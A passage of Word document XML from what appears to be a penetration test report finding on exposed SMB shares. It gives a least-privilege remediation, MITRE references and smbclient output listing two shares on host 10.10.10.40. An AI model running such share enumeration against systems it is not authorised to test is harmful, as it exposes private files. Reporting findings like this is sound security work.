              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="252" w:lineRule="exact"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00164775">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Review file share privileges to ensure that users are granted access in accordance with the principal of least privilege</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC35E4">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00607D78" w:rsidRPr="004F0AF2" w14:paraId="6C94545C" w14:textId="77777777" w:rsidTr="001334A6">
        <w:trPr>
          <w:trHeight w:val="816"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ED7D31" w:themeFill="accent2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73379263" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="00205061" w:rsidRDefault="00607D78" w:rsidP="00FB57DE">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="35F7DF7E" w14:textId="77777777" w:rsidR="00607D78" w:rsidRDefault="00607D78" w:rsidP="00C92A6B">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="1133"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidRPr="00C92A6B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Exposed SMB Share</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0145C49C" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="004F0AF2" w:rsidRDefault="00607D78" w:rsidP="00C92A6B">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="1133"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidRPr="00950A75">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;ACK M1026</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> – Privileged Account Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11753667" w14:textId="77777777" w:rsidR="00607D78" w:rsidRPr="004F0AF2" w:rsidRDefault="00607D78">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B4B880" w14:textId="77777777" w:rsidR="00607D78" w:rsidRDefault="00607D78" w:rsidP="0083654F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1725"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0AF2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3D15E" w14:textId="18833892" w:rsidR="00607D78" w:rsidRPr="004F0AF2" w:rsidRDefault="00443079" w:rsidP="0083654F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1725"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using smbclient, the tester was able to access to </w:t>
      </w:r>
      <w:r w:rsidR="008A237D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 (two) SMB file share</w:t>
      </w:r>
      <w:r w:rsidR="00EA53E1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A45B9E"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5BC119" w14:textId="77777777" w:rsidR="00A57B5A" w:rsidRPr="00A57B5A" w:rsidRDefault="00A57B5A" w:rsidP="00A57B5A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFF00"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFF00"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>└─# smbclient \\\\10.10.10.40\\Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0BA9EF"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Password for [WORKGROUP\root]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53830519"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Try "help" to get a list of possible commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646770AA"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>smb: \&gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A08C4"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  .                                  DR        0  Fri Jul 21 02:56:23 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F2D54"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  ..                                 DR        0  Fri Jul 21 02:56:23 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4ADF89"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  Default                           DHR        0  Tue Jul 14 03:07:31 2009</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E5386"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8723D5"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r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  Public                             DR        0  Tue Apr 12 03:51:29 2011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E766849"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p>
    <w:p w14:paraId="2F8BA46B" w14:textId="77777777" w:rsidR="00A57B5A" w:rsidRPr="00A57B5A" w:rsidRDefault="00A57B5A" w:rsidP="00A57B5A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">        4692735 blocks of size 4096. 657911 blocks available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F65EE" w14:textId="77777777" w:rsidR="00A57B5A" w:rsidRPr="00A57B5A" w:rsidRDefault="00A57B5A" w:rsidP="00A57B5A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A57B5A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">smb: \&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47567DDE" w14:textId="77777777" w:rsidR="00A57B5A" w:rsidRDefault="00A57B5A" w:rsidP="00B94616"/>
    <w:p w14:paraId="694A4F46" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D0288A" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFF00"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>└─#</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFF00"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> smbclient \\\\10.10.10.40\\Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B0167D" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Password for [WORKGROUP\root]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5BA9E2" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Try "help" to get a list of possible commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390E8DE" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>smb: \&gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942551A" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  .                                   D        0  Fri Jul 14 09:48:44 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C7B915" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  ..                                  D        0  Fri Jul 14 09:48:44 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69145762" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C693500" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">        4692735 blocks of size 4096. 657911 blocks available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B231823" w14:textId="77777777" w:rsidR="00B1185C" w:rsidRPr="00B1185C" w:rsidRDefault="00B1185C" w:rsidP="00B1185C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1185C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">smb: \&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE08D66" w14:textId="794D1301" w:rsidR="003014A6" w:rsidRDefault="003014A6" w:rsidP="00B94616"/>
    <w:p w14:paraId="1CDF01E1" w14:textId="5F2B41DE" w:rsidR="003014A6" w:rsidRDefault="003014A6"/>
    <w:p w14:paraId="5FE89947" w14:textId="3FA8450A" w:rsidR="00B1185C" w:rsidRDefault="00043F38" w:rsidP="00B94616">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="356D6BAC" wp14:editId="3F8F58A4">
            <wp:simplePos x="526211" y="888521"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionV>
            <wp:extent cx="4077069" cy="948055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1559482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82536" name="Picture 1559482536"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="8701" t="42214" r="5630" b="37865"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4077069" cy="948055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B1185C" w:rsidSect="00951A03">
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId18"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1397" w:right="835" w:bottom="1454" w:left="83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F3E83" w14:textId="77777777" w:rsidR="00633544" w:rsidRDefault="00633544" w:rsidP="0078093A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
